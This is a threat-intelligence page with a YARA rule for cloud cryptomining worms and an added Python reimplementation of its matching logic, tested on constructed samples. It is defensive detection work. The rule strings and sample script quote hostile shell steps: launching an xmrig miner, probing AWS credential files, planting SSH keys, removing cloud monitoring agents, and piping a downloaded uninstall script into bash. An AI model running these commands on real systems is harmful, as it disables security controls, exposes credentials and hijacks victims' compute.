Common Information
| Type | Value |
|---|---|
| Category | |
| Type | Yara Rule |
| Misp Type | |
| Description | |

Value:

```yara
rule cloud_mining_worm {
    meta:
        description = "Detects Common Cloud Mining Worms"
        author = " [email protected] "
        date = "2020-08-16"
        license = "Apache License 2.0"
        hash1 = "3a377e5baf2c7095db1d7577339e4eb847ded2bfec1c176251e8b8b0b76d393f"
        hash2 = "929c3017e6391b92b2fbce654cf7f8b0d3d222f96b5b20385059b584975a298b"
        hash3 = "705a22f0266c382c846ee37b8cd544db1ff19980b8a627a4a4f01c1161a71cb0"
    strings:
        $a = "echo $LOCKFILE | base64 -d > $tmpxmrigfile" ascii wide
        $b = "/root/.tmp/xmrig config=/root/.tmp/" ascii wide
        $c = "if [ -s /usr/bin/curl ]; then" ascii wide
        $d = "echo found: /root/.aws/credentials'" ascii wide
        $e = "function KILLMININGSERVICES(){" ascii wide
        $g = "touch /root/.ssh/authorized_keys 2>/dev/null 1>/dev/null" ascii wide
        $h = "rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service" ascii wide
        $i = " [email protected] /root/.ssh/id_ed25519.pub" ascii wide
        $j = "echo '0' >/proc/sys/kernel/nmi_watchdog" ascii wide
        $k = "curl http://update.aegis.aliyun.com/download/uninstall.sh | bash" ascii wide
        $l = "rm -f /var/tmp/kinsing" ascii wide
    condition:
        filesize < 500KB and any of them
}
```
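As an added example, not part of the indicator record above and not code from the rule's author, the following Python re-implements the matching semantics of `cloud_mining_worm` without the yara library so the rule's behaviour can be checked offline. Every string in the rule carries the `ascii wide` modifiers, so each one is searched in both its one-byte encoding and its UTF-16LE ("wide") encoding, and `filesize < 500KB` gates the whole match. The shell fragments scanned below are constructed for the demonstration and are not real samples; `$i` is left out because its value is redacted on this page.

```python
"""Pure-Python re-implementation of the matching logic of the YARA rule
cloud_mining_worm: 'filesize < 500KB and any of them' over ascii|wide strings.
Added example; not the rule author's code."""
from __future__ import annotations

# String atoms copied from the rule on this page. $i is omitted because its
# value (an ssh public-key comment) is redacted in the page text.
RULE_STRINGS: dict[str, str] = {
    "$a": "echo $LOCKFILE | base64 -d > $tmpxmrigfile",
    "$b": "/root/.tmp/xmrig config=/root/.tmp/",
    "$c": "if [ -s /usr/bin/curl ]; then",
    "$d": "echo found: /root/.aws/credentials'",
    "$e": "function KILLMININGSERVICES(){",
    "$g": "touch /root/.ssh/authorized_keys 2>/dev/null 1>/dev/null",
    "$h": "rm -rf /etc/init.d/agentwatch /usr/sbin/aliyun-service",
    "$j": "echo '0' >/proc/sys/kernel/nmi_watchdog",
    "$k": "curl http://update.aegis.aliyun.com/download/uninstall.sh | bash",
    "$l": "rm -f /var/tmp/kinsing",
}

MAX_FILESIZE = 500 * 1024  # YARA's "500KB" is 500 * 1024 bytes


def matching_strings(data: bytes) -> dict[str, list[int]]:
    """Return {identifier: [offsets]} for every rule string found in data.

    The 'ascii wide' modifiers mean both the plain one-byte encoding and the
    UTF-16LE encoding of each string are searched, which is what YARA does.
    """
    hits: dict[str, list[int]] = {}
    for ident, text in RULE_STRINGS.items():
        offsets: list[int] = []
        for encoded in (text.encode("ascii"), text.encode("utf-16-le")):
            start = 0
            while (pos := data.find(encoded, start)) != -1:
                offsets.append(pos)
                start = pos + 1
        if offsets:
            hits[ident] = sorted(offsets)
    return hits


def rule_matches(data: bytes) -> bool:
    """condition: filesize < 500KB and any of them"""
    return len(data) < MAX_FILESIZE and bool(matching_strings(data))


# Constructed sample: a fragment shaped like the droppers the rule targets.
# It is not a real sample and is unrelated to the hashes in the rule's meta.
SAMPLE_SH = b"""#!/bin/bash
echo '0' >/proc/sys/kernel/nmi_watchdog
pkill -f kinsing
rm -f /var/tmp/kinsing
curl http://update.aegis.aliyun.com/download/uninstall.sh | bash
"""

# The same fragment as UTF-16LE: only the 'wide' half of the modifier sees it.
SAMPLE_WIDE = SAMPLE_SH.decode("ascii").encode("utf-16-le")

# A 600 KB blob carrying one atom at its end: the filesize guard suppresses it.
SAMPLE_TOO_BIG = b"A" * (600 * 1024) + RULE_STRINGS["$l"].encode("ascii")

# A benign script with none of the atoms.
SAMPLE_CLEAN = b"#!/bin/bash\necho hello\n"

if __name__ == "__main__":
    for name, blob in (("ascii", SAMPLE_SH), ("wide", SAMPLE_WIDE),
                       ("too_big", SAMPLE_TOO_BIG), ("clean", SAMPLE_CLEAN)):
        print(f"{name:8} match={rule_matches(blob)!s:5} "
              f"strings={sorted(matching_strings(blob))}")
```

The third sample shows the consequence of the `filesize < 500KB` guard as written: a file that contains the atoms but is larger than 500 KB does not fire the rule, even though `matching_strings` still reports the hit. When triaging with this rule, a size-gated miss is worth remembering.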